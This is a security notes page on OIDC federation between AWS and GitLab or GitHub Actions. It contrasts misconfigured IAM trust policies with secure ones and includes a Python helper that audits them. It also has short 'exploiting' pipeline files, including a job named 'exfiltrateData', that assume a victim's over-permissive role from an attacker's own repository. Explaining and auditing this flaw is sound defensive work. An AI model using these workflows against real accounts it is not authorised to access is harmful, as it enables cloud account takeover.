# OpenID Connect (OIDC)

## What is OIDC?

* [OpenID Connect](https://openid.net/developers/how-connect-works/#:~:text=It%20is%20easy%2C%20reliable%2C%20secure,the%20most%20expert%20service%20providers.) is an authentication protocol based on the OAuth 2.0 framework that eliminates the need for storing and managing passwords
* Within AWS, an Identity Provider can be configured for OIDC ID Federation between AWS and the service
* An IAM Role along with its Trust Policy and Permissions policy is created and tied to the Identity Provider

***

## GitLab OIDC with AWS

* GitLab and AWS can integrate via OIDC, allowing GitLab pipelines to authenticate and assume an IAM Role within AWS to manage or deploy resources securely
* If the Role's Trust Policy is misconfigured (or otherwise poorly configured), **any** GitLab pipeline could authenticate to the AWS account (assuming the attacker has identified the AWS Account ID and IAM Role name), exposing its permissions to attackers

### GitLab AWS IAM Role Misconfigured Trust Policy

* This IAM Role Trust Policy allows any connection from GitLab.com: the only condition it checks is the `aud` claim, so a pipeline in any GitLab.com project can assume the role

{% code overflow="wrap" %}

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:oidc-provider/gitlab.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "gitlab.com:aud": "https://gitlab.com"
        }
      }
    }
  ]
}
```

{% endcode %}

### GitLab AWS IAM Role Secure Trust Policy

* To resolve this, specify [additional conditions](https://docs.gitlab.com/ee/ci/cloud_services/index.html#configure-a-conditional-role-with-oidc-claims) in the IAM Role's Trust Policy that pin the token's `sub` claim to the intended project and branch, e.g.:

{% code overflow="wrap" %}

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:oidc-provider/gitlab.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "gitlab.com:aud": "https://gitlab.com",
          "gitlab.com:sub": "project_path:Engineering/AWS-Deployments:ref_type:branch:ref:main"
        }
      }
    }
  ]
}
```

{% endcode %}

* This new Trust Policy only allows requests from the "main" branch of the "AWS-Deployments" project in the GitLab group "Engineering"; a token minted by any other project, branch or tag fails the `sub` condition

### GitLab Exploiting the Misconfigured Trust Policy

{% hint style="warning" %}
CI/CD Variables are also needed for this to work. See my [blog post here](https://blog.pwnedlabs.io/abusing-identity-providers-in-aws) for setup.
{% endhint %}

```yaml
# .gitlab-ci.yml
variables:
  AWS_DEFAULT_REGION: us-east-1
  AWS_PROFILE: "oidc"   # profile name used by the AWS CLI in this job

oidc:
  image:
    name: amazon/aws-cli:latest
    entrypoint: [""]    # override the image entrypoint so the script runs as plain shell
  id_tokens:
    # Ask GitLab to mint an OIDC ID token with the audience the trust policy expects
    GITLAB_OIDC_TOKEN:
      aud: https://gitlab.com
  script:
    # The role ARN and token-file location come from the CI/CD variables mentioned in the hint above
    - aws sts get-caller-identity
```

***

## GitHub Actions OIDC with AWS

* GitHub and AWS can integrate via OIDC, allowing GitHub pipelines to authenticate and assume an IAM Role within AWS to manage or deploy resources securely
* If the Role's Trust Policy is misconfigured (or otherwise poorly configured), **any** GitHub pipeline could authenticate to the AWS account (assuming the attacker has identified the AWS Account ID and IAM Role name), exposing its permissions to attackers

### GitHub Actions AWS IAM Role Misconfigured Trust Policy

* This IAM Role Trust Policy allows any connection from GitHub.com: the only condition it checks is the `aud` claim, so a workflow in any GitHub repository can assume the role

{% code overflow="wrap" %}

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::012345678910:oidc-provider/token.actions.githubusercontent.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
        }
      }
    }
  ]
}
```

{% endcode %}

### GitHub Actions AWS IAM Role Secure Trust Policy

* To resolve this, specify [additional conditions](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_create_for-idp_oidc.html#idp_oidc_Create_GitHub) in the IAM Role's Trust Policy that pin the token's `sub` claim to the intended repository and branch, e.g.:

{% code overflow="wrap" %}

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::012345678910:oidc-provider/token.actions.githubusercontent.com"
      },
      "Action": "sts:AssumeRoleWithWebIdentity",
      "Condition": {
        "StringEquals": {
          "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
          "token.actions.githubusercontent.com:sub": "repo:MyOrg/MyRepo:ref:refs/heads/main"
        }
      }
    }
  ]
}
```

{% endcode %}
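The GitLab and GitHub trust policies above share one defect: no `sub` condition. The following audit helper, added here as an example and not code from the original page, parses a role trust policy and flags `sts:AssumeRoleWithWebIdentity` statements for either provider that lack a `<issuer>:sub` condition or set it to a bare `StringLike` wildcard; the sample policy is constructed in the shape of the misconfigured GitLab policy shown above.

```python
import json

# Condition-key prefixes of the two OIDC identity providers this page covers.
OIDC_ISSUERS = ("gitlab.com", "token.actions.githubusercontent.com")

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _condition_values(condition, key):
    """Yield (operator, value) pairs bound to one IAM condition key, e.g. ("StringEquals", "...")."""
    for operator, pairs in condition.items():
        for value in _as_list(pairs.get(key, [])):
            yield operator, value

def audit_trust_policy(policy):
    """Return a list of findings for a role trust policy (dict); an empty list means nothing flagged."""
    findings = []
    for i, stmt in enumerate(_as_list(policy.get("Statement", []))):
        if stmt.get("Effect") != "Allow" or "sts:AssumeRoleWithWebIdentity" not in _as_list(stmt.get("Action", [])):
            continue
        principal = stmt.get("Principal", {})
        issuer = (principal.get("Federated", "") if isinstance(principal, dict) else "").rsplit("oidc-provider/", 1)[-1]
        if issuer not in OIDC_ISSUERS:
            continue  # not a GitLab/GitHub federation statement, out of scope here
        subs = list(_condition_values(stmt.get("Condition", {}), f"{issuer}:sub"))
        if not subs:
            findings.append(f"statement {i}: no '{issuer}:sub' condition, any {issuer} pipeline can assume this role")
        elif any("Like" in op and val.strip() == "*" for op, val in subs):
            findings.append(f"statement {i}: '{issuer}:sub' is StringLike '*', which matches every pipeline")
    return findings

def with_sub_condition(policy, issuer, sub_value):
    """Return a copy of `policy` that pins `<issuer>:sub` to one project and branch with StringEquals."""
    fixed = json.loads(json.dumps(policy))  # cheap deep copy
    for stmt in _as_list(fixed["Statement"]):
        stmt.setdefault("Condition", {}).setdefault("StringEquals", {})[f"{issuer}:sub"] = sub_value
    return fixed

# Constructed sample in the shape of the over-permissive GitLab policy shown on this page.
MISCONFIGURED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": "arn:aws:iam::123456789012:oidc-provider/gitlab.com"},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": {"StringEquals": {"gitlab.com:aud": "https://gitlab.com"}},
    }],
}
```

Run `audit_trust_policy` over the output of `aws iam get-role` (the `AssumeRolePolicyDocument` field) for each role tied to a GitLab or GitHub OIDC provider; `with_sub_condition` shows the minimal fix, but the exact `sub` format differs between the two providers as the policies above illustrate.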

### GitHub Actions Exploiting the Misconfigured Trust Policy

```yaml
# .github/workflows/main.yml

name: AWS example workflow
on: push
env:
  AWS_REGION: "us-east-1"
# permission can be added at job level or workflow level
permissions:
  id-token: write   # This is required for requesting the JWT
  contents: read    # This is required for actions/checkout
jobs:
  exfiltrateData:
    runs-on: ubuntu-latest
    steps:
      - name: Git clone the repository
        uses: actions/checkout@v4
      - name: configure aws credentials
        uses: aws-actions/configure-aws-credentials@v4.0.2
        with:
          role-to-assume: arn:aws:iam::123456789012:role/github # replace with IAM role to assume
          role-session-name: github-role # can be named whatever, shows in AWS logs
          aws-region: ${{ env.AWS_REGION }}

      - name: get role identity
        run: |
          aws sts get-caller-identity
```
